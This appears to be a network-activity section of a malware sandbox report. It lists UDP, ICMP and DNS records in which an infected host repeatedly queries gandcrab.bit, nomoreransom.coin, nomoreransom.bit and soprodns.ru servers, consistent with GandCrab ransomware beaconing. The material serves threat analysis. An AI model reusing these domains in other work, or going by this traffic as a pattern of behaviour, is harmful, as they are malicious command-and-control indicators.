                                      Sep 1, 2022 00:00:05.176443100 CEST53573918.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:05.176877975 CEST5739253192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:05.194662094 CEST53573928.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:06.266103029 CEST5022853192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:07.256401062 CEST5022853192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:07.399528980 CEST53502288.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:07.412708044 CEST5022953192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:07.432984114 CEST53502298.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:07.433896065 CEST5023053192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:07.454828024 CEST53502308.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:07.455720901 CEST5023153192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:07.479063988 CEST53502318.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:07.481525898 CEST5023253192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:07.501718998 CEST53502328.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:07.502496004 CEST5023353192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:07.524806976 CEST53502338.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:07.918035030 CEST53502288.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:08.675157070 CEST5326953192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:09.687948942 CEST5326953192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:09.840522051 CEST53532698.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:09.849908113 CEST5327053192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:09.867008924 CEST53532708.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:09.867791891 CEST5327153192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:09.887459040 CEST53532718.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:09.889720917 CEST5982853192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:09.910227060 CEST53598288.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:09.911396027 CEST5982953192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:09.933176994 CEST53598298.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:09.936009884 CEST5983053192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:09.956068039 CEST53598308.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:11.257081985 CEST5110553192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:11.285418034 CEST53511058.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:11.291388988 CEST5245653192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:11.304387093 CEST53532698.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:11.310426950 CEST53524568.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:11.310934067 CEST5245753192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:11.330421925 CEST53524578.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:11.330852985 CEST5245853192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:11.350558043 CEST53524588.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:11.350931883 CEST5245953192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:11.370852947 CEST53524598.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:11.371195078 CEST5246053192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:11.388839006 CEST53524608.8.8.8192.168.2.3

                                      ICMP Packets

                                      TimestampSource IPDest IPChecksumCodeType
                                      Aug 31, 2022 23:58:18.899866104 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                      Aug 31, 2022 23:58:21.675904036 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                      Aug 31, 2022 23:58:28.756336927 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                      Aug 31, 2022 23:58:40.380204916 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                      Aug 31, 2022 23:58:43.196728945 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                      Aug 31, 2022 23:59:18.697181940 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                      Aug 31, 2022 23:59:20.757663965 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                      Aug 31, 2022 23:59:27.705205917 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                      Aug 31, 2022 23:59:32.146743059 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                      Aug 31, 2022 23:59:36.792562962 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                      Aug 31, 2022 23:59:39.088548899 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                      Aug 31, 2022 23:59:45.793106079 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                      Aug 31, 2022 23:59:46.698131084 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                      Aug 31, 2022 23:59:48.699120045 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                      Aug 31, 2022 23:59:50.593031883 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                      Aug 31, 2022 23:59:56.952230930 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                      Sep 1, 2022 00:00:02.702019930 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                      Sep 1, 2022 00:00:03.830478907 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                      Sep 1, 2022 00:00:07.922203064 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                      Sep 1, 2022 00:00:11.304521084 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                      Aug 31, 2022 23:58:02.760505915 CEST192.168.2.38.8.8.80xfb1fStandard query (0)ipv4bot.whatismyipaddress.comA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:04.036793947 CEST192.168.2.38.8.8.80x837dStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:04.671662092 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:04.692158937 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:04.718662977 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:58:04.739443064 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:04.757896900 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:58:07.165702105 CEST192.168.2.38.8.8.80xc956Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:07.294450998 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:07.312591076 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:07.331283092 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:07.365561008 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:07.384051085 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:13.881591082 CEST192.168.2.38.8.8.80x17Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:14.902959108 CEST192.168.2.38.8.8.80x17Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:14.982489109 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:15.004693985 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:15.025135994 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:15.043750048 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:15.064662933 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:17.123805046 CEST192.168.2.38.8.8.80xbb4fStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:18.161257982 CEST192.168.2.38.8.8.80xbb4fStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:18.284126997 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:18.304316998 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:18.324816942 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:58:18.345424891 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:18.371185064 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:58:20.518393040 CEST192.168.2.38.8.8.80xccdbStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:21.514583111 CEST192.168.2.38.8.8.80xccdbStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:21.674954891 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:21.699516058 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:21.721379995 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:21.744663000 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:21.768917084 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:23.738740921 CEST192.168.2.38.8.8.80xea6eStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:24.732259989 CEST192.168.2.38.8.8.80xea6eStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:24.850137949 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:24.884406090 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:24.905091047 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:24.925441980 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:24.944174051 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:27.219465017 CEST192.168.2.38.8.8.80xa774Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:27.292717934 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:27.316054106 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:27.336745024 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:58:27.361900091 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:27.382469893 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:58:32.660929918 CEST192.168.2.38.8.8.80xaf62Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:33.320008993 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:33.338202000 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:33.358758926 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:33.379307032 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:33.402808905 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:35.661753893 CEST192.168.2.38.8.8.80xd7cbStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:36.532491922 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:36.550637007 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:36.580327988 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:36.600605965 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:36.619046926 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:38.594002962 CEST192.168.2.38.8.8.80x3115Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:39.608630896 CEST192.168.2.38.8.8.80x3115Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:39.711462975 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:39.736547947 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:39.762542009 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:58:39.799617052 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:39.827074051 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:58:41.899421930 CEST192.168.2.38.8.8.80x4b60Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:42.906723976 CEST192.168.2.38.8.8.80x4b60Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:42.963799000 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:42.984219074 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:43.003278017 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:43.024086952 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:43.044194937 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:45.860322952 CEST192.168.2.38.8.8.80xc71cStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:46.506845951 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:46.526858091 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:46.555077076 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:46.573612928 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:46.594398022 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:52.439661980 CEST192.168.2.38.8.8.80x4a62Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:52.509126902 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:52.529035091 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:52.552397013 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:58:52.570688963 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:52.590786934 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:58:54.559582949 CEST192.168.2.38.8.8.80xcea6Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:54.611123085 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:54.630989075 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:54.651252031 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:54.669703007 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:54.690068007 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:56.637871027 CEST192.168.2.38.8.8.80x98daStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:56.711035013 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:56.731127977 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:56.749512911 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:56.772804976 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:56.793273926 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:59.232460976 CEST192.168.2.38.8.8.80xbf18Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:59.292783976 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:59.312763929 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:59.338818073 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:58:59.357353926 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:59.376303911 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:01.363595963 CEST192.168.2.38.8.8.80x33a6Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:01.436424971 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:01.454658031 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:01.474961042 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:01.493232965 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:01.511754036 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:03.366775036 CEST192.168.2.38.8.8.80x4894Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:03.423759937 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:03.441447020 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:03.462712049 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:03.482703924 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:03.503720045 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:05.917948008 CEST192.168.2.38.8.8.80x428cStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:06.518330097 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:06.541033030 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:06.561108112 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:06.582118988 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:06.600199938 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:11.520944118 CEST192.168.2.38.8.8.80xf42eStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:12.277647972 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:12.297575951 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:12.328339100 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:12.348893881 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:12.369224072 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:14.234563112 CEST192.168.2.38.8.8.80x4340Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:14.331684113 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:14.353291035 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:14.371988058 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:14.392903090 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:14.413882971 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:15.707844973 CEST192.168.2.38.8.8.80xca4bStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:15.767276049 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:15.789041996 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:15.809427023 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:15.838541031 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:15.856786013 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:17.091232061 CEST192.168.2.38.8.8.80x160bStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:18.080478907 CEST192.168.2.38.8.8.80x160bStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:18.249520063 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:18.269253969 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:18.287184954 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:18.305428028 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:18.325584888 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:19.656590939 CEST192.168.2.38.8.8.80x9891Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:20.653614998 CEST192.168.2.38.8.8.80x9891Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:20.699863911 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:20.720499992 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:20.740564108 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:20.761806011 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:20.780160904 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:22.015532970 CEST192.168.2.38.8.8.80xc448Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:22.154289007 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:22.173866034 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:22.195880890 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:22.215950966 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:22.235685110 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:23.593552113 CEST192.168.2.38.8.8.80x9641Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:24.188785076 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:24.206868887 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:24.227190971 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
